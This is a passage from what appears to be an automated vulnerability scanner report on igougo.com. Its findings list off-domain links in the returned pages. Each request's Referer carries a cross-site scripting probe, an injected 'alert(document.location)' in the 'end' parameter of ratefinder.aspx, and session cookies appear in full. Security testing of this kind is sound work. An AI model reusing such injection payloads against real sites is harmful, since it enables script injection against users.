<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="5ZNp3byNbF4rEWpnV3Mgyig3ck+AM/H1JHJZ7rg546Nro6tmpBO79IXKcqIJ4C7B68/bNMrfxkMrNXTYUJtk3H/IsKviVwR5Iwpi2TYMU6oH4U3USehc0e6zulY=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=68309251634531891317407305&adsize=728x90&pagepos=1&random=634531891317407305?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=68309251634531891317407305&adsize=728x90&pagepos=1&random=634531891317407305?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=68309251634531891317407305&adsize=728x90&pagepos=1&random=634531891317407305?" border="0"></a>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=68309251634531891317407305&adsize=728x90&pagepos=2&random=634531891317407305?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=68309251634531891317407305&adsize=728x90&pagepos=2&random=634531891317407305?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=68309251634531891317407305&adsize=728x90&pagepos=2&random=634531891317407305?" border="0"></a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" class="ica i-twitter" target="_blank" rel="nofollow">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/igougo" class="ica i-facebook" target="_blank" rel="nofollow">Facebook</a>
...[SNIP]...
<p class="h3"> This bear is pensive. <a target="_blank" href="http://ow.ly/6JOui">http://ow.ly/6JOui</a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" target="_blank" rel="nofollow" >Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://svc.travelocity.com/mediakit/igougo-brandoverview.html" rel="nofollow" target="_blank">Advertise</a>
...[SNIP]...
<dd><a href="http://www.travelocity.co.in" target="_blank">Travelocity India</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.hk" target="_blank">Zuji Hong Kong</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.sg" target="_blank">Zuji Singapore</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.in" target="_blank">India Hotels</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.au" target="_blank">Zuji Australia</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com" target="_blank">Travelocity</a>
...[SNIP]...
<dd><a href="http://www.travelocity.ca/ca" target="_blank">Travelocity Canada</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com.mx/mx" target="_blank">Travelocity Mexico</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com" target="_blank">USA Hotels</a>
...[SNIP]...
<dd><a href="http://www.fr.lastminute.com" target="_blank">Lastminute.com France</a>
...[SNIP]...
<dd><a href="http://www.it.lastminute.com" target="_blank">Lastminute.com Italy</a>
...[SNIP]...
<dd><a href="http://www.es.lastminute.com" target="_blank">Lastminute.com Spain</a>
...[SNIP]...
<dd><a href="http://www.rejsefeber.dk" target="_blank">Rejsefeber Denmark</a>
...[SNIP]...
<dd><a href="http://www.reisefeber.no/" target="_blank">Reisefeber Norway</a>
...[SNIP]...
<dd><a href="http://www.resfeber.se/" target="_blank">Resfeber Sweden</a>
...[SNIP]...
<dd><a href="http://travelocity.com/LA" target="_blank">Travelocity LatAm</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.co/" target="_blank">Colombia Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.ec/" target="_blank">Ecuador Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.ve/" target="_blank">Venezuela Hotels</a>
...[SNIP]...
<noscript>
   <img src="http://b.scorecardresearch.com/b?c1=2&c2=3005558&c3=&c4=&c5=&c6=&c15=&cv=2.0&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...

19.206. http://www.igougo.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179047228.1875149061.1317601642.1317601642.1317601642.1; __utmb=179047228.1.10.1317601644; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D125%3B; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-2; mbox=session#1317601622475-177474#1317604709|PC#1317601622475-177474.19#1318812449|check#true#1317602909; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:02:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36807


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="NVxZLHrIqCswN0wRDdLbAP4q6i7JUBF/BSBKXwsRucQjl8JZXW8fooMbdWdfUcptWjfwNfh3+gW3yrXemG3k7WR8V+VhyM0fcttuCxI346cfwmMHvuUlHs6/8Fc=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=724122354634531861569375000&adsize=728x90&pagepos=1&random=634531861569375000?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=724122354634531861569375000&adsize=728x90&pagepos=1&random=634531861569375000?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=724122354634531861569375000&adsize=728x90&pagepos=1&random=634531861569375000?" border="0"></a>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=724122354634531861569375000&adsize=728x90&pagepos=2&random=634531861569375000?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=724122354634531861569375000&adsize=728x90&pagepos=2&random=634531861569375000?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=724122354634531861569375000&adsize=728x90&pagepos=2&random=634531861569375000?" border="0"></a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" class="ica i-twitter" target="_blank" rel="nofollow">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/igougo" class="ica i-facebook" target="_blank" rel="nofollow">Facebook</a>
...[SNIP]...
<p class="h3"> This bear is pensive. <a target="_blank" href="http://ow.ly/6JOui">http://ow.ly/6JOui</a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" target="_blank" rel="nofollow" >Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://svc.travelocity.com/mediakit/igougo-brandoverview.html" rel="nofollow" target="_blank">Advertise</a>
...[SNIP]...
<dd><a href="http://www.travelocity.co.in" target="_blank">Travelocity India</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.hk" target="_blank">Zuji Hong Kong</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.sg" target="_blank">Zuji Singapore</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.in" target="_blank">India Hotels</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.au" target="_blank">Zuji Australia</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com" target="_blank">Travelocity</a>
...[SNIP]...
<dd><a href="http://www.travelocity.ca/ca" target="_blank">Travelocity Canada</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com.mx/mx" target="_blank">Travelocity Mexico</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com" target="_blank">USA Hotels</a>
...[SNIP]...
<dd><a href="http://www.fr.lastminute.com" target="_blank">Lastminute.com France</a>
...[SNIP]...
<dd><a href="http://www.it.lastminute.com" target="_blank">Lastminute.com Italy</a>
...[SNIP]...
<dd><a href="http://www.es.lastminute.com" target="_blank">Lastminute.com Spain</a>
...[SNIP]...
<dd><a href="http://www.rejsefeber.dk" target="_blank">Rejsefeber Denmark</a>
...[SNIP]...
<dd><a href="http://www.reisefeber.no/" target="_blank">Reisefeber Norway</a>
...[SNIP]...
<dd><a href="http://www.resfeber.se/" target="_blank">Resfeber Sweden</a>
...[SNIP]...
<dd><a href="http://travelocity.com/LA" target="_blank">Travelocity LatAm</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.co/" target="_blank">Colombia Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.ec/" target="_blank">Ecuador Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.ve/" target="_blank">Venezuela Hotels</a>
...[SNIP]...
<noscript>
   <img src="http://b.scorecardresearch.com/b?c1=2&c2=3005558&c3=&c4=&c5=&c6=&c15=&cv=2.0&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...

19.207. http://www.igougo.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-3; mbox=session#1317601622475-177474#1317604892|PC#1317601622475-177474.19#1318812632|check#true#1317603092; __utma=179047228.1875149061.1317601642.1317601642.1317603064.1; __utmb=179047228.2.10.1317601644; __utmc=179047228; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D0%3B; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:00:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36807


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="jPFyPOMFqOIyySa1Ijk47BJFS78c8e34J/QbTBG6D+LxhAxUsjypMF6hiFDTpoMbcfo9sE57OmQ9GgbZpzfvNckFyhKdrmHnA0uwRcf2yHhSGoL+1kOWQ6RHFhI=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=798742402634531860109256513&adsize=728x90&pagepos=1&random=634531860109256513?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=798742402634531860109256513&adsize=728x90&pagepos=1&random=634531860109256513?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=798742402634531860109256513&adsize=728x90&pagepos=1&random=634531860109256513?" border="0"></a>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=798742402634531860109256513&adsize=728x90&pagepos=2&random=634531860109412760?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=798742402634531860109256513&adsize=728x90&pagepos=2&random=634531860109412760?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=798742402634531860109256513&adsize=728x90&pagepos=2&random=634531860109412760?" border="0"></a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" class="ica i-twitter" target="_blank" rel="nofollow">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/igougo" class="ica i-facebook" target="_blank" rel="nofollow">Facebook</a>
...[SNIP]...
<p class="h3"> This bear is pensive. <a target="_blank" href="http://ow.ly/6JOui">http://ow.ly/6JOui</a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" target="_blank" rel="nofollow" >Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://svc.travelocity.com/mediakit/igougo-brandoverview.html" rel="nofollow" target="_blank">Advertise</a>
...[SNIP]...
<dd><a href="http://www.travelocity.co.in" target="_blank">Travelocity India</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.hk" target="_blank">Zuji Hong Kong</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.sg" target="_blank">Zuji Singapore</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.in" target="_blank">India Hotels</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.au" target="_blank">Zuji Australia</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com" target="_blank">Travelocity</a>
...[SNIP]...
<dd><a href="http://www.travelocity.ca/ca" target="_blank">Travelocity Canada</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com.mx/mx" target="_blank">Travelocity Mexico</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com" target="_blank">USA Hotels</a>
...[SNIP]...
<dd><a href="http://www.fr.lastminute.com" target="_blank">Lastminute.com France</a>
...[SNIP]...
<dd><a href="http://www.it.lastminute.com" target="_blank">Lastminute.com Italy</a>
...[SNIP]...
<dd><a href="http://www.es.lastminute.com" target="_blank">Lastminute.com Spain</a>
...[SNIP]...
<dd><a href="http://www.rejsefeber.dk" target="_blank">Rejsefeber Denmark</a>
...[SNIP]...
<dd><a href="http://www.reisefeber.no/" target="_blank">Reisefeber Norway</a>
...[SNIP]...
<dd><a href="http://www.resfeber.se/" target="_blank">Resfeber Sweden</a>
...[SNIP]...
<dd><a href="http://travelocity.com/LA" target="_blank">Travelocity LatAm</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.co/" target="_blank">Colombia Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.ec/" target="_blank">Ecuador Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.ve/" target="_blank">Venezuela Hotels</a>
...[SNIP]...
<noscript>
   <img src="http://b.scorecardresearch.com/b?c1=2&c2=3005558&c3=&c4=&c5=&c6=&c15=&cv=2.0&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...

19.208. http://www.igougo.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179047228.1875149061.1317601642.1317601642.1317601642.1; __utmb=179047228.1.10.1317601644; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D125%3B; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-2; mbox=session#1317601622475-177474#1317604709|PC#1317601622475-177474.19#1318812449|check#true#1317602909; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:52:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36807


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="B9TPERwQcR+D/nBPJDRqBKD1IcNELB0s1zPw+XALdvHgPFTe4T0RRGzh0YSgIuK78WpCRw48jXCy7RKSJLmMTPuuebMaFQABqNR5D8K4959K3DUL1p0gQOIzC9k=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=328994155634531855518125000&adsize=728x90&pagepos=1&random=634531855518125000?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=328994155634531855518125000&adsize=728x90&pagepos=1&random=634531855518125000?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=328994155634531855518125000&adsize=728x90&pagepos=1&random=634531855518125000?" border="0"></a>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=328994155634531855518125000&adsize=728x90&pagepos=2&random=634531855518125000?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=328994155634531855518125000&adsize=728x90&pagepos=2&random=634531855518125000?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=328994155634531855518125000&adsize=728x90&pagepos=2&random=634531855518125000?" border="0"></a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" class="ica i-twitter" target="_blank" rel="nofollow">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/igougo" class="ica i-facebook" target="_blank" rel="nofollow">Facebook</a>
...[SNIP]...
<p class="h3"> This bear is pensive. <a target="_blank" href="http://ow.ly/6JOui">http://ow.ly/6JOui</a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" target="_blank" rel="nofollow" >Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://svc.travelocity.com/mediakit/igougo-brandoverview.html" rel="nofollow" target="_blank">Advertise</a>
...[SNIP]...
<dd><a href="http://www.travelocity.co.in" target="_blank">Travelocity India</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.hk" target="_blank">Zuji Hong Kong</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.sg" target="_blank">Zuji Singapore</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.in" target="_blank">India Hotels</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.au" target="_blank">Zuji Australia</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com" target="_blank">Travelocity</a>
...[SNIP]...
<dd><a href="http://www.travelocity.ca/ca" target="_blank">Travelocity Canada</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com.mx/mx" target="_blank">Travelocity Mexico</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com" target="_blank">USA Hotels</a>
...[SNIP]...
<dd><a href="http://www.fr.lastminute.com" target="_blank">Lastminute.com France</a>
...[SNIP]...
<dd><a href="http://www.it.lastminute.com" target="_blank">Lastminute.com Italy</a>
...[SNIP]...
<dd><a href="http://www.es.lastminute.com" target="_blank">Lastminute.com Spain</a>
...[SNIP]...
<dd><a href="http://www.rejsefeber.dk" target="_blank">Rejsefeber Denmark</a>
...[SNIP]...
<dd><a href="http://www.reisefeber.no/" target="_blank">Reisefeber Norway</a>
...[SNIP]...
<dd><a href="http://www.resfeber.se/" target="_blank">Resfeber Sweden</a>
...[SNIP]...
<dd><a href="http://travelocity.com/LA" target="_blank">Travelocity LatAm</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.co/" target="_blank">Colombia Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.ec/" target="_blank">Ecuador Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.ve/" target="_blank">Venezuela Hotels</a>
...[SNIP]...
<noscript>
   <img src="http://b.scorecardresearch.com/b?c1=2&c2=3005558&c3=&c4=&c5=&c6=&c15=&cv=2.0&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...

19.209. http://www.igougo.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-3; mbox=session#1317601622475-177474#1317604892|PC#1317601622475-177474.19#1318812632|check#true#1317603092; __utma=179047228.1875149061.1317601642.1317601642.1317603064.1; __utmb=179047228.2.10.1317601644; __utmc=179047228; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D0%3B; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:54:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36807


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="htUBgDWgvvvhpb2xHSKIzmWayFVjHUNiN+bbTswgTjdNej6MQx2CBFHihW9CB61llOgCDzIRoiGaakK7axh51mklWwWfScOWQx9a7tggZDZI6snXPCpFOlzwKII=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=566650180634531856683906250&adsize=728x90&pagepos=1&random=634531856683906250?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=566650180634531856683906250&adsize=728x90&pagepos=1&random=634531856683906250?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=566650180634531856683906250&adsize=728x90&pagepos=1&random=634531856683906250?" border="0"></a>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=566650180634531856683906250&adsize=728x90&pagepos=2&random=634531856683906250?" type="text/javascript"></script>
               <noscript>
